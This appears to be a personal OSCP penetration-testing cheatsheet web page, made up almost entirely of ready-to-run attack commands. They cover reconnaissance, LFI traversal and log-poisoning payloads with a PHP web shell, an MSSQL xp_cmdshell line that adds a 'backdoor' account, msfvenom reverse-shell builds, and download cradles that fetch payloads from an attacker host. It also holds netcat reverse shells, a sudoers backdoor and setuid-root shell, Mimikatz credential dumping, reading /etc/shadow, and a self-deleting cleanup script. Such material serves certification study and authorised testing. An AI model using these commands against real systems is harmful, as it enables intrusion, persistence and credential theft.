Skip to content

OSCP Cheatsheet #

This was the cheatsheet and containing the methodologies that were compiled when I took my OSCP.

I just left this as is and made a bigger cheatsheet on top of this, which is this site.


OSINT #

  • GDorks
  • Open up the social media accounts

Reconnaissance #

1
2
3
4
5
6
7
nmap -sP $subnet -oA sP-$subnet
nmap -sS $host -oA sS-$rhost
nmap -A -p $ports -oA A-$rhost
nmap -sS -T4 -p- $host -oA -sS-T4-p-$rhost
nmap -sC -T4 $host  -oA sC-T4-$host  nmap -sT -T4 $host -oA sT-T4-$rhost  nmap -sA -T4 $rhost -oA sA-T4-$rhost 
unicornscan -v -m U -p all $rhost unicornscan-udp-$rhost
python3 autorecon.py $rhost

Network #

  • SNMP:
    1
    2
    snmp-check $rhost
    snmpwalk -v $snmpVersion -c $snmpComString $rhost
    
  • RPC:

    1
    2
    3
    4
    5
    enum4linux $rhost
    python ridenum.py $rhost 1 50000 
    # Note Max: 100 range only. duplicate py and edit, add on line #97 sid="S-1-5-21-3001938989-124212845-530053634", get the sid from rpcclient manually using command lookupnames root or administrator
    rpcclient -U "" $rhost
    smbtree $rhost
    

  • NFS:

    1
    showmount -e $rhost
    

  • SMB/SAMBA:

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    #!/bin/sh
    #Author: rewardone
    #Thanks fellow student OS-40285!
    #
    #Description:
    # enum4linux messed up and doesnt report samba version.
    # 
    # Requires root or enough permissions to use tcpdump
    # Will listen for the first 7 packets of a null login
    # and grab the SMB Version
    #Notes:
    # Will sometimes not capture or will print multiple
    # lines. May need to run a second time for success.
    if [ -z $1 ]; then echo "Usage: $0 <ipaddress> <port>" && exit; else rhost=$1; fi 
    if [ ! -z $2 ]; then rport=$2; else rport=139; fi
    tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " & 
    echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
    echo "" && sleep .1
    
    1
    for i in $(ls /usr/share/nmap/scripts|grep smb-vuln-); do echo ==================== && echo [+] $i && echo ==================== && nmap --script $i -p 139,445 $rhost;done
    
    1
    nmap -v -sV -p 139,445 --script="smb-vuln-*" $rhost
    

  • FTP:
    1
    nmap -b anonymous:[email protected]$rhost $rhost -p- -Pn
    
  • TCPDUMP:
    1
    tcpdump -A -XX -vvv -n -i eth0 src $rhost
    

Databases #

  • TNSListener
  • MySQL: Executing shell on windows from db:31
    • HackMag32
  • MSSQL:
    1
    nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse $rhost -p1433 --script-args mssql.username=sa,mssql.password=$password,ms-sql-xp-cmdshell.cmd="net user backdoor backdoor123 /add"
    
  • MSSQL:

Web #

1
2
wafw00f http://$rhost
nikto -h $url -C all -oX
  • Directory:
    1
    2
    3
    4
    5
    gobuster dir -w $dirlist -u http://$rhost -l -t 50 (l for size,t for threads)
    dirbuster -l /usr/share/wordlists/dirbuster/directory-list-1.0.txt =R  -s / -t 40 -r ./dirbuster-$host -u http://$host (Turn off "recursive"  adjust threads to 30-45)
    skipfish -YO http://$rhost:$rport -o skipfish_output
    wget -r http://$rhost:$rport -o wget_output
    # BurpSuite - Spider from Results of dirbuster
    
  • Webdav Test

    1
    2
    davtest -url $url
    cadaver $url:80
    

  • LFI:

    1
    2
    3
    http://$url/index/../../../../etc/passwd
    $url/index/../../../../etc/passwd%00
    \n \r
    

    • Bypass Sanitation:
      1
      2
      3
      4
      5
      $url/index/2E%2E%%2F%2E%2E%%2F%2E%2E%%2F%2E%2E%%2Fetc%2Fpasswd
      $url/index/..\/..\/..\/..\/etc\/passwd
      $url/index/..//..//..//..//etc//passwd
      $url/index/..///..///..///..///etc///passwd
      # http://www.vulnerability-lab.com/resources/documents/587.txt
      
      1
      2
      dotdotpwn -m http-url -u http(s)://$rhost:$rport/$somepage.php?$page=TRAVERSAL -k $word (root if linux, find if MS) 
      LFI_Scanner.py (https://github.com/monkeysm8/CTF-Stuff/blob/master/LFI_Scanner.py)
      
  • LFI to RCE:

    • To try first before the proc/self/fd/$numberToFigureOut: Proc/self/environ
      1
      https://$url/$directory/$somephp.php?$phpfunction=../../../../../../../../../proc/self/fd/$numberFromFDsizeFindOutfromProcSelfStatus(number usually 0-32)
      
    • paste the following in User-Agent Burp: <?php system($_GET['cmd']); ?> then access 1st url in this line/section then add =$command at the end 2728
    • Another version of above. Input <?php system($_GET[‘cmd’]); ?> in URL first then access the access or error log
    • Go through this link one by one 2930
  • PUT:

    • UPLOAD:
      1
      curl --upload-file  php-reverse-shell.txt -v --url http://$rhost/$dir/reverse_shell.php -0 --http1.0
      
  • Adobe Coldfusion: https://nets.ec/Coldfusion_hacking
  • SQLi:
    1
    nmap -sV -p $rport --script=http-sql-injection $rhost
    
  • WFUZZ:

    • Directory:
      1
      wfuzz -v -c  -w $wordlist -u $url/FUZZ -p $burpIPandPort:HTTP  -H "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0" -H "$Cookie_Field" -f wfuzz_results.txt #(put FUZZ wherever you want to) 
      
    • SQLi:

      1
      wfuzz -v -c  -w /usr/share/wordlists/wfuzz/Injections/SQL.txt -u $url/index.php?id=FUZZ -p $burpIPandPort:HTTP  -H "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0" -H "$Cookie_Field" -f wfuzz_results.txt
      

    • BRUTEFORCE:

      • MULTIPLE:
        1
        wfuzz -v -c  -w $wordlist_username -w $wordlist_password -u $url/login.php -d "username=FUZZ=FUZ2Z" -p $burpIPandPort:HTTP  -H "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0" -H "$Cookie-Field" -f wfuzz_results.txt
        
      • SINGLE:
        1
        wfuzz -v -c  -w $wordlist -u $url/login.php -d "username=admin=FUZZ" -p $burpIPandPort:HTTP  -H "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0" -H "$Cookie-Field" -f wfuzz_results.txt
        
    • WORDPRESS:
      1
      2
      3
      4
      wpscan --url http://$rhost
      wpscan --url http://$rhost --enumerate u
      wpscan --url http://$rhost --wordlist /usr/share/wordlists/rockyou-10k.txt --user admin
      nmap -sV --script=http-wordpress-brute --script-args 'userdb=/root/Downloads/user.txt,passdb=/usr/share/wordlists/rockyou-10k.txt,http-wordpress-brute.threads=3,brute.firstonly=true' $rhost
      
    • Dashboard to RCE Shell: Pentaroot

Brute Forcing Online #

  1. cewl $url -m 6 -w $url.txt
  2. Edit /etc/john/john.conf and add the lines below to the end
    1
    2
    3
    4
    20$[0-2]$[0-9]
    19$[5-9]$[0-9]
    $[0-9]$[0-9]
    $[0-9]$[0-9]$[0-9]
    
  3. john --wordlist=cewl-$url.txt --rules --stdout cewl-johnMutated-wordlist-$url.txt

  4. SSH/FTP/MSSQL:

    1
    hydra -t 4 -l $username -P $wordlist $rhost $protocol(ssh/ftp/mssql)[common usernames: mssql=sa,ssh=root,ftp=anonymous/root,]
    

  5. RDP:
    1
    ncrack -u $username -P $wordlist $rhost:$rport
    
  6. WEB:
    1
    medusa -h $url -u admin -P cewl-johnMutated-wordlist-$url.txt -M http -m DIR:/(where the login is) -T 10
    
    • BurpSuite
  7. HTTP-BasicAuth:
    1
    hydra -t 4 -L $username-wordlist -P cewl-johnMutated-wordlist-$url.txt $rhost -s $rport http-get /$rpath
    
  8. SMB:
    1
    hydra -l $username -P $wordlist.txt $rhost smb -V
    

Exploitation #

  • exploit-db.com
  • Security Focus
  • CVE details
  • Github
  • Google
  • Compilation: i686-w64-mingw32-gcc -lws2_32 $filename.c -o $filename.exe

Initial Shell Checks #

  • Windows:
    1
    hostname & whoami /all & ipconfig & systeminfo & net user & net localgroup & net user /domain & tasklist /V
    
  • Linux:
    1
    hostname && whoami && id && w && ifconfig && cat /etc/*release* && uname -a && env && export -p && sudo -l
    
  • Find in Windows:
    1
    dir /s $driverletter:\$filenameorpattern - i.e.(dir /s c:\proof.txt)
    
  • Find in Unix:
    1
    find / -name $filenametofind
    

Shells #

  • Try to use empire instead of metasploit for post exploitation and reverse shell
  • MSFVENOM:

    1
    msfvenom -p windows/shell_reverse_tcp LHOST=$lhost LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o reverse_shell.exe
    

  • WGET-Win-PS1:

    1
    2
    3
    4
    5
    6
    echo $storageDir = $pwd  wget.ps1
    echo $webclient = New-Object System.Net.WebClient wget.ps1
    echo $url = "http://$lhost:8000/reverse_shell.exe" wget.ps1
    echo $file = "reverse_shell.exe" wget.ps1
    echo $webclient.DownloadFile($url,$file) wget.ps1
    powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
    

  • WGET-Win-VBS:

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    echo strUrl = WScript.Arguments.Item(0)  wget.vbs
    echo StrFile = WScript.Arguments.Item(1)  wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0  wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0  wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1  wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2  wget.vbs
    echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts  wget.vbs
    echo Err.Clear  wget.vbs
    echo Set http = Nothing  wget.vbs
    echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1")  wget.vbs
    echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")  wget.vbs
    echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")  wget.vbs
    echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")  wget.vbs
    echo http.Open "GET", strURL, False  wget.vbs
    echo http.Send  wget.vbs
    echo varByteArray = http.ResponseBody  wget.vbs
    echo Set http = Nothing  wget.vbs
    echo Set fs = CreateObject("Scripting.FileSystemObject")  wget.vbs
    echo Set ts = fs.CreateTextFile(StrFile, True)  wget.vbs
    echo strData = ""  wget.vbs
    echo strBuffer = ""  wget.vbs
    echo For lngCounter = 0 to UBound(varByteArray)  wget.vbs
    echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1)))  wget.vbs
    echo Next  wget.vbs
    echo ts.Close  wget.vbs
    cscript wget.vbs http://$lhost:8000/reverse_shell.exe reverse_shell.exe
    

  • WGET-Windows-FTP:
    1
    2
    3
    4
    5
    6
    7
    8
    echo open $lhost 21 ftp.txt
    echo USER anonymous ftp.txt
    echo anonymous ftp.txt
    echo bin  ftp.txt
    echo hash  ftp.txt
    echo GET reverse_shell.exe  ftp.txt
    echo bye  ftp.txt
    ftp -v -n -s:ftp.txt
    
  • WGET-Python:

    1
    python -c "import urllib; urllib.urlretrieve ('http://$url:8000/$filename', 'C:\$filename')"
    

  • Hosting-HTTP:

    1
    python3 -m http.server
    

  • Hosting-FTP:
    1
    python -m pyftpdlib -p 21(pip install pyftpdlib)
    

Privilege Escalation - Linux #

  • linuxprivchecker.py 1
  • linux-local-enum.sh2
  • LinEnum.sh 3
  • Pspy:
    1
    ./pspy64 -pf -i 1000 -c  (Run this in another terminal/shell right after enum scripts)
    
  • Check for writable folders:

    1
    for directory1 in $(ls -lR 21 / | grep -v "Permission" |grep dr|grep xrw|grep -v "drwxrwxr-x"|grep -v driver|grep -v drv|grep -v ""|awk '{print $9}'); do for directory2 in $(find / -name $directory1 21|grep -v "Permission"); do ls -ld $directory2|grep xrw|grep -v ""; done; done
    
    * ADD to sudoers command:
    1
    2
    echo '#!/bin/bash'  /tmp/addMeToSUDOERS
    echo 'echo "www-data ALL=NOPASSWD: ALL"  /etc/sudoers && chmod 440 /etc/sudoers'  /tmp/addMeToSUDOERS
    
    * ADD to sudoers command: * ALTERNATIVE to ABOVE:
    1
    2
    3
    4
    5
    6
    7
    int main(void)
    { 
    setgid(0);
    setuid(0);
    execl("/bin/sh", "sh", 0); 
    }
    # Compile with: `gcc test.c -o test`
    
    1
    2
    3
    4
    #!/bin/bash
    chown root /tmp/test 
    chgrp root /tmp/test
    chmod u+s /tmp/test 
    
    * OUT_OF_IDEAS?: dpkg -l and check versions with exploit-db * STILL OUT?: Follow g0tm1lk 4


Privilege Escalation - Windows #

  • WindowsPrivCheck.bat 2425(requires accesschk.exe)
    • 1
      powershell -exec bypass -command "IEX (New-Object System.Net.Webclient).DownloadFile('http://$lhost:$lport/WinPrivCheck.bat','WinPrivCheck.bat');"
      
    • 1
      powershell -exec bypass -command "IEX (New-Object System.Net.Webclient).DownloadFile('http://$lhost:$lport/accesschk.exe','accesschk.exe');" 
      
  • windows-privesc-check2.exe
    • 1
      windows-privesc-check2.exe -A --dump
      
  • Check for missing patches:
    • WMIC:
      1
      wmic qfe get Caption,Description,HotFixID,InstalledOn
      
  • POTATO: by foxglovesec:
    1
    start /b Potato.exe -ip 10.11.1.218 -cmd "C:\\temp\\rev.exe" -disable_exhaust true
    
  • With Powershell

    • PowerSploit-PowerUp.ps1:
      1
      powershell -exec bypass -windowstyle hidden -command "IEX (New-Object System.Net.Webclient).DownloadString('http://$lhost:$lport/PowerUp.ps1');Invoke-AllChecks"
      
    • PowerSploit-PowerUp.ps1:
      • In PowerShell Exec BypassMode:
        • Import-Module .\PowerUp.ps1 \r\n then in another line Invoke-AllChecks
    • PowerUp.ps1:
      • Write-UserAddMSI (if installedAlwaysElevated in On)
    • Sherlock:
      • 1
        powershell -exec bypass -windowstyle hidden -command "IEX (New-Object System.Net.Webclient).DownloadString('http://$lhost:$lport/Sherlock.ps1');Find-AllVulns"
        
    • JAWS:26

      1
      CMD C:\temp powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
      
    • POTATO: PS: Tater by Kevin Robertson

    • Find SSH,RDP Creds: SessionGopher by FireEye
    • Empire Privilege Escalation
  • To NTAUTHORITY

    • Escalating to NTAUTHORITY\System:
      1
      psexec.exe -acceptula -s -u $username cmd
      
    • Escalating to NTAUTHORITY\System (w/rdp):
      1
      psexec.exe -acceptula -s -u $username -p $password nc $lhost $lport C:\Windows\System32\cmd.exe
      
    • Escalating to NTAUTHORITY\System (w.o./rdp):
      1
      psexec.exe -i -s C:\dir\dir\nc.exe $lhost $lport -e  C:\windows\system32\cmd.exe
      
    • Escalating to NTAUTHORITY\System:
      1
      runas nc $lhost $lport C:\Windows\System32\cmd.exe
      

Privilege Escalation Exploits #

  • LINUX: Ubuntu 11.04/11.10 or Linux Kernel 2.6.39 3.2.2 which covers 3.0.0 too BTW Memmodipper 5
  • LINUX: DirtyCow: Ubuntu 12.04 LTS ,Ubuntu 14.04 LTS (Linux Mint 17.1),Debian 8 ,Ubuntu 16.04 LTS ,Ubuntu 16.10 ,RHEL 7, CentOS 7 ,RHEL 6, CentOS 6 ,RHEL 5, CentOS 5
  • LINUX: CHKROOTKIT: 0.49 6

Dumping Credentials #

  • Mimikatz: Either PS Empire, Meterpreter, or direct download of exe file 7
  • Mimikatz:
    • Binary:
      1
      2
      3
      4
      5
      6
      7
      8
      log
      privilege::debug
      sekurlsa::logonPasswords
      lsadump::sam
      lsadump::secrets
      lsadump::cache
      vault::cred
      vault:list
      
  • wce.exe -w 8
  • fgdump.exe 9

Network Pivoting #

  • Windows:
    • Plink:
      1
      plink $lhost -P 22 -C -R 127.0.0.1:$lport:$rhost:$rport
      
  • Linux:
    • Proxychains: *

      1
      ssh -D 127.0.0.1:$lport -p 22 $ruser@pivot-target-ip
      

      • (Add socks4 127.0.0.1 $lport in /etc/proxychains.conf)

      • [all_cmds_on_kali]

        1
        ssh -D $proxychainsport -p 22 $ruser@$rhost
        

        • (Add in last line in /etc/proxychains.conf: socks4 127.0.0.1 $proxychainsport )
        • proxychains [command )i.e. nmap . ..)]

OSCP Post Checks #

  • Windows:

    • Plink:
      1
      plink $lhost -P 22 -C -R 127.0.0.1:$lport:$rhost:$rport
      
    • CREDENTIALS DUMP(mimikatz,wce,fgdump) then

      1
      systeminfo & ipconfig & route print & arp -a & dir /s network-secret.txt & dir /s *pass* & psloggedon.exe -accepteula
      

    • ProxyChains:

      • proxychain via ssh to target then:
        • proxychains /root/Tools/post_checks.sh
    • [all_cmds_on_kali]

      1
      ssh -D $proxychainsport -p 22 $ruser@$rhost
      

      • (Add in last line in /etc/proxychains.conf: socks4 127.0.0.1 $proxychainsport )
      • proxychains [command )i.e. nmap . ..)]
    • Enable RDP:9

  • Linux:

    1
    ls /root && cat /root/proof.txt && find / -name network-secret.txt && cat /etc/shadow && route -n && arp -a && ifconfig && netstat -plunt && w  
    


House Cleaning #

  • Generic - Remove Reverse Shells
  • Generic - Remove Reverse Meterpreter
  • Generic - Remote Accounts
  • Web - Reverse/Bind PHP files
  • Web - Remove Reflected XSS Entries
  • Windows - Remove Task Scheduler
  • Windows - Remove Registry
  • Windows - Remove Startup Folder
  • Linux - Remove Crontab entries
  • Linux - Remove Cron.d entries
  • Linux - Remove rc.local entries
  • Linux - Remove /etc/init.d/ entries
  • Linux - Remove Sysctl entries
  • Phishing - Removal of Phishing email
  • Malware - Activate Kill Switch
  • Malware - Cleanup manually
  • Self Deleting Batch Command:
    1
    2
    3
    4
    echo timeout /t 60 >>  cleanupselfdelete.bat
    echo del reverse_shell.exe >> cleanupselfdelete.bat
    echo ^(goto^) 2^nul ^ del ^"%~f0^" >> cleanupselfdelete.bat
    start cleanupselfdelete.bat
    

CheatSheets #

  • Common Commands 10
  • Pentest Monkey11
  • UPDATE January 2021: This cheatsheet!

Other Resources #

  • VA-UK12
  • Password List13
  • Escaping Shell14

OSCP Resources #

  • Noobpad 15
  • Sec Juice16
  • scund00r17
  • backdoorshell18
  • 0xc0ffee19
  • swisskyrepo20
  • ihack4falafel21
  • kevsec22
  • futureoscp23

Last update: May 8, 2021